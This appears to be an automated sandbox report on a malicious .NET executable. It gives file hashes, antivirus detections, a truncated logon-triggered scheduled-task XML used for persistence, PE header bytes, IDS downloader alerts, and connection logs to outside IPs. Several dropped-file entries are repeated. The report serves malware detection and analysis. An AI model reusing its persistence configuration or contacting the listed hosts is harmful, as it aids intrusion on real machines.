                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1585
                                            Entropy (8bit):5.123142960937494
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt5Vxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTlv
                                            MD5:AF0B975FAADFFAE6300682837F087F8C
                                            SHA1:F7EF947489F2841451D7DF5B345B98A0DD251451
                                            SHA-256:B75099A2895224ECA8B021C98BEBF31B976B703E78332835943EF7A5D9C73A51
                                            SHA-512:8499DA722C92AA9038E60BD0C03B15CA3FE0AD238F0759BDF235D7AA9038201E31F7057F05628B53B45B2E1A5932BAFD23E7774189F9F0FD457D0BFFB7629BFB
                                            Malicious:true
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                            Process:C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1585
                                            Entropy (8bit):5.123142960937494
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt5Vxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTlv
                                            MD5:AF0B975FAADFFAE6300682837F087F8C
                                            SHA1:F7EF947489F2841451D7DF5B345B98A0DD251451
                                            SHA-256:B75099A2895224ECA8B021C98BEBF31B976B703E78332835943EF7A5D9C73A51
                                            SHA-512:8499DA722C92AA9038E60BD0C03B15CA3FE0AD238F0759BDF235D7AA9038201E31F7057F05628B53B45B2E1A5932BAFD23E7774189F9F0FD457D0BFFB7629BFB
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                            Process:C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):617984
                                            Entropy (8bit):7.886314439150102
                                            Encrypted:false
                                            SSDEEP:12288:fYVqW8F9057V2WnuYJBcw/6oxYP4Tl9SZZGQ4qS6q:rLs0WnuYP6KeokZZGdqbq
                                            MD5:4D74CEBD8DDAAE78DE8144F1ABB245E5
                                            SHA1:8E8423E4AF53A91B9750014235773F9EC38916DF
                                            SHA-256:2A2625E85758DFDC4AB64036BB679F519B8802ECCCDBA37EEC44FB99E68E35A9
                                            SHA-512:DB4959B2A762416A62FC95FD06C5B5836189EF6E785CFAAAA2E26E28602A8DB2AA71893DD72833490CDF631321AC6C7AB5A168BBF671DFA1BB98AB8C827D3426
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 32%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s.;g..............0..N..........~l... ........@.. ....................................@.................................,l..O.................................................................................... ............... ..H............text....L... ...N.................. ..`.rsrc................P..............@..@.reloc...............l..............@..B................`l......H..........L...........$N..............................................j.(............s....(....&*..0.................%.(...+.s....}...........%.(...+.%.(...+.s ...}.....s!...}.....s"...}......{....o#....{....o$....{....o%....{....o&...si...}....*.0..4.......s'.....{.....(...+.H...()...r...p(*.........(+...t^.....[...%......+(+...t^.....[...(-....%......+(+...t^.....[...(-....(-.........%...(...+o...+o0....{.....(...+.B...()...r...p(*......h...(+...t^.....[...%......+(+...t
                                            Process:C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.886314439150102
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:PROFORMA + PENDENTES.exe
                                            File size:617'984 bytes
                                            MD5:4d74cebd8ddaae78de8144f1abb245e5
                                            SHA1:8e8423e4af53a91b9750014235773f9ec38916df
                                            SHA256:2a2625e85758dfdc4ab64036bb679f519b8802ecccdba37eec44fb99e68e35a9
                                            SHA512:db4959b2a762416a62fc95fd06c5b5836189ef6e785cfaaaa2e26e28602a8db2aa71893dd72833490cdf631321ac6c7ab5a168bbf671dfa1bb98ab8c827d3426
                                            SSDEEP:12288:fYVqW8F9057V2WnuYJBcw/6oxYP4Tl9SZZGQ4qS6q:rLs0WnuYP6KeokZZGdqbq
                                            TLSH:E3D412E817A90337C27FA9B7673171A443B5EE5B64A2D34E49C460D9AB83F2121633D3
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s.;g..............0..N..........~l... ........@.. ....................................@................................
                                            Icon Hash:0595150b64f0390f
                                            Entrypoint:0x496c7e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x673B1273 [Mon Nov 18 10:09:55 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x96c2c0x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x980000x1ab8.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x9a0000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x94c840x94e0095f4ea772231c7b22cbb21f26d968d72False0.9060384524559194data7.8959477360806245IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0x980000x1ab80x1c001649bb892b7b83cfc2f4638a1c54c56fFalse0.8041294642857143data7.2180470687303355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x9a0000xc0x2002c47834b67a360980f9437dbe0a074e9False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x981000x1439PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9592428047131544
                                            RT_GROUP_ICON0x9954c0x14data1.05
                                            RT_VERSION0x995700x348data0.43333333333333335
                                            RT_MANIFEST0x998c80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                            DLLImport
                                            mscoree.dll_CorExeMain
                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-11-18T18:18:44.688413+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849709158.101.44.24280TCP
                                            2024-11-18T18:18:46.219431+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849709158.101.44.24280TCP
                                            2024-11-18T18:18:46.999640+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849712188.114.97.3443TCP
                                            2024-11-18T18:18:47.703797+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849713158.101.44.24280TCP
                                            2024-11-18T18:18:49.988518+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849716188.114.97.3443TCP
                                            2024-11-18T18:18:50.657522+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849717158.101.44.24280TCP
                                            2024-11-18T18:18:51.735169+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849717158.101.44.24280TCP
                                            2024-11-18T18:18:52.714103+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849722188.114.97.3443TCP
                                            2024-11-18T18:18:53.453796+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849724158.101.44.24280TCP
                                            2024-11-18T18:18:54.183906+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849727188.114.97.3443TCP
                                            2024-11-18T18:18:54.487444+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849729188.114.97.3443TCP
                                            2024-11-18T18:18:54.891309+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849731158.101.44.24280TCP
                                            2024-11-18T18:18:57.885212+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849737188.114.97.3443TCP
                                            2024-11-18T18:19:01.307167+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849741188.114.97.3443TCP
                                            2024-11-18T18:19:03.984760+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849743188.114.97.3443TCP
                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 18, 2024 18:18:43.814687967 CET4970980192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:43.820096970 CET8049709158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:43.820173979 CET4970980192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:43.820655107 CET4970980192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:43.825695038 CET8049709158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:44.475091934 CET8049709158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:44.486680031 CET4970980192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:44.491719007 CET8049709158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:44.635963917 CET8049709158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:44.688412905 CET4970980192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:44.708462954 CET49711443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:44.708497047 CET44349711188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:44.708648920 CET49711443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:44.736424923 CET49711443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:44.736444950 CET44349711188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:45.428107023 CET44349711188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:45.428184032 CET49711443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:45.475187063 CET49711443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:45.475217104 CET44349711188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:45.475631952 CET44349711188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:45.516275883 CET49711443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:45.540380955 CET49711443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:45.583399057 CET44349711188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:45.921363115 CET44349711188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:45.921430111 CET44349711188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:45.921619892 CET49711443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:46.021318913 CET49711443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:46.025723934 CET4970980192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:46.031239033 CET8049709158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:46.175990105 CET8049709158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:46.177891016 CET49712443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:46.177953959 CET44349712188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:46.178112030 CET49712443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:46.178402901 CET49712443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:46.178419113 CET44349712188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:46.219430923 CET4970980192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:46.832295895 CET44349712188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:46.835072041 CET49712443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:46.835165024 CET44349712188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:46.999711037 CET44349712188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:46.999866009 CET44349712188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:46.999928951 CET49712443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:47.000377893 CET49712443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:47.005310059 CET4970980192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:47.006447077 CET4971380192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:47.010828018 CET8049709158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:47.010974884 CET4970980192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:47.011420965 CET8049713158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:47.011521101 CET4971380192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:47.011665106 CET4971380192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:47.016447067 CET8049713158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:47.658689976 CET8049713158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:47.660134077 CET49714443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:47.660223007 CET44349714188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:47.660342932 CET49714443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:47.660609007 CET49714443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:47.660644054 CET44349714188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:47.703797102 CET4971380192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:48.327665091 CET44349714188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:48.329941988 CET49714443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:48.329982042 CET44349714188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:48.501416922 CET44349714188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:48.501497030 CET44349714188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:48.501739025 CET49714443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:48.502131939 CET49714443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:48.517056942 CET4971580192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:48.522129059 CET8049715158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:48.522219896 CET4971580192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:48.522344112 CET4971580192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:48.527677059 CET8049715158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:49.162628889 CET8049715158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:49.163978100 CET49716443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:49.164019108 CET44349716188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:49.164107084 CET49716443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:49.164403915 CET49716443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:49.164418936 CET44349716188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:49.203831911 CET4971580192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:49.805617094 CET44349716188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:49.807279110 CET49716443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:49.807322025 CET44349716188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:49.814331055 CET4971780192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:49.819299936 CET8049717158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:49.819386959 CET4971780192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:49.819799900 CET4971780192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:49.824567080 CET8049717158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:49.988544941 CET44349716188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:49.988630056 CET44349716188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:49.988699913 CET49716443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:49.989151955 CET49716443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:49.993772984 CET4971580192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:49.994919062 CET4971880192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:49.999229908 CET8049715158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:49.999332905 CET4971580192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:49.999826908 CET8049718158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:49.999911070 CET4971880192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:50.000060081 CET4971880192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:50.004884005 CET8049718158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:50.456991911 CET8049717158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:50.461107969 CET4971780192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:50.466075897 CET8049717158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:50.607223988 CET8049717158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:50.644622087 CET49719443192.168.2.8188.114.97.3
